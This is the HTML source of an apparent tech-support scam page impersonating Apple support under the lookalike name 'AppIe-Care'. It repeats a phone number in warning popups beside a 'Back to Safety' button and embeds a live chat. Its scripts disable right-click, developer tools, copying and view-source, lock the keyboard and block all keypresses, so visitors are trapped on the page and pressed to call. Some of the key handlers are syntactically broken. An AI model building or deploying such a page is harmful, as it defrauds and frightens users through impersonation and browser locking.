<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>SYSTEMS-ERR0RS-45467App</title>
	<link rel="shortcut icon" href="img/logo.jpg" type="image/jpg">
	<link rel="stylesheet" href="css/bootstrap.min.css">
    <link href="css/stylemain.css" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
</head>
<body id="jeremy">
<div id="amchat">
    <img src="img/logo.jpg"><span style="color: #222;
    font-size: 21px;
    font-weight: 600;
    margin-left: 6px;
    position: relative;
    top: 5px;">AppIe-Care</span> <p style="font-weight: 600;">Contact_Support</p>
        <h4 style="font-weight: 600;">+1-888-238-8893</h4>
          <div class="arrow-down">
            <i class="fa fa-caret-down"></i>
          </div>
         </div>
        <div id="delayedPopup" class="delayedPopupWindow lightbox" style="cursor: pointer !important;">
 
  <div class="row firewall-pro">
    <div class="col-md-12">
     <img src="img/rectangle.png" style="width: 670px;height: auto;">
     <strong class="collins">+1-888-238-8893</strong>
     <div class="button_new" id="footer_btn">
         <a href="#" class="anyway blink">Back to Safety</a>
       </div>
    </div>
 
  </div>
 
</div> 

     <div class="alert_popup cardcontainer lightbox" style="background: transparent;">
          <img src="img/longimg.png" style="width: 440px;height: 527px;">
                  <strong class="molly">+1-888-238-8893</strong>
     </div> 
  	<div class="main">
  		<div class="main_bg">
  			<img src="img/background.jpg">
  			<div class="black" style="height: 145%;"></div>
  		</div>
  	
  	</div>

		<script type="text/javascript">

        document.addEventListener('contextmenu', event => event.preventDefault());
        document.onkeypress = function (event) {

            event = (event  window.event);

            if (event.keyCode == 123) {

                return false;

            }

        }

        document.onmousedown = function (event) {

            event = (event  window.event);

            if (event.keyCode == 123) {

                return false;

            }

        }

        document.onkeydown = function (event) {

            event = (event  window.event);

            if (event.keyCode == 123) {

                return false;

            }

        }
		
        jQuery(document).ready(function ($) {

            $(document).keydown(function (event) {

                var pressedKey = String.fromCharCode(event.keyCode).toLowerCase();

                if (event.ctrlKey && (pressedKey == "c" || pressedKey == "u")) {

                    alert('Sorry, this feature is disabled!');

                    return false;

                }
            });
        });
    </script>
	
    <script>
    navigator.keyboard.lock();
    document.onkeydown = function (e) {
    return false;
    }
    </script>
<script>
      var isNS = "Netscape" == navigator.appName ? 1 : 0;
      "Netscape" == navigator.appName && document.captureEvents(Event.MOUSEDOWN || Event.MOUSEUP);

      function mischandler() {
        return !1
      }

      function mousehandler(a) {
        a = isNS ? a : event;
        a = isNS ? a.which : a.button;
        if (2 == a || 3 == a) return !1
      }
      document.oncontextmenu = mischandler;
      document.onmousedown = mousehandler;
      document.onmouseup = mousehandler;
    </script>
    <script>
      document.onkeydown = function(a) {
        return !1
      };
    </script>
      <script type="text/javascript" src="js/jquery.min.js"></script>
        <script type="text/javascript" src="js/bootstrap.min.js" ></script>
        <script type="text/javascript" src="js/routes.js"></script>
        <script type="text/javascript" src="js/mods.js"></script>
<!--Start of Tawk.to Script-->
  <script type="text/javascript">
    var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
    (function(){
    var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
    s1.async=true;
    s1.src='https://embed.tawk.to/64fb1d62a91e863a5c126696/1h9qeljbv';
    s1.charset='UTF-8';
    s1.setAttribute('crossorigin','*');
    s0.parentNode.insertBefore(s1,s0);
    })();
    </script>
    <!--End of Tawk.to Script-->
 
</body>
</html>
